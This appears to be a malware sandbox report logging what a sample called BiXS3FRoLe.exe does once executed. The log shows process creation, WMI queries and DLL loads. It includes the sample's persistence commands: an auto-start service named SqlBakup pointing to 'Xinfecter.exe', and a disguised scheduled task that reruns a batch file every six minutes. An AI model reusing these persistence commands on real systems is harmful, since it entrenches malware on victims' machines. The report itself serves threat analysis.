      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4612"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6592"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6752"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6572"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2440"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5352"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6692"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5356"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5888"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7516"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7516"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7552"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7616"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7724"::GetOwner
      Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6668"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'BIXS3FROLE.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'BIXS3FROLE.EXE'
      Source: C:\Windows\SysWOW64\find.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\find.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'BIXS3FROLE.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'BIXS3FROLE.EXE'
      Source: C:\Windows\SysWOW64\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: tasklist.exe, 00000004.00000003.1278119642.00000000033C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processs;o
      Source: tasklist.exe, 00000004.00000003.1279876506.00000000033C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processs;
      Source: BiXS3FRoLe.exe ReversingLabs: Detection: 84%
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe File read: C:\Users\user\Desktop\BiXS3FRoLe.exe
      Source: unknown Process created: C:\Users\user\Desktop\BiXS3FRoLe.exe "C:\Users\user\Desktop\BiXS3FRoLe.exe"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: unknown Process created: C:\Windows\System32\Sgrmuserer.exe C:\Windows\system32\Sgrmuserer.exe
      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
      Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
      Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: netapi32.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: samcli.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: dsrole.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: samlib.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: mpr.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: napinsp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: pnrpnsp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: wshbth.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: nlaapi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: winrnr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
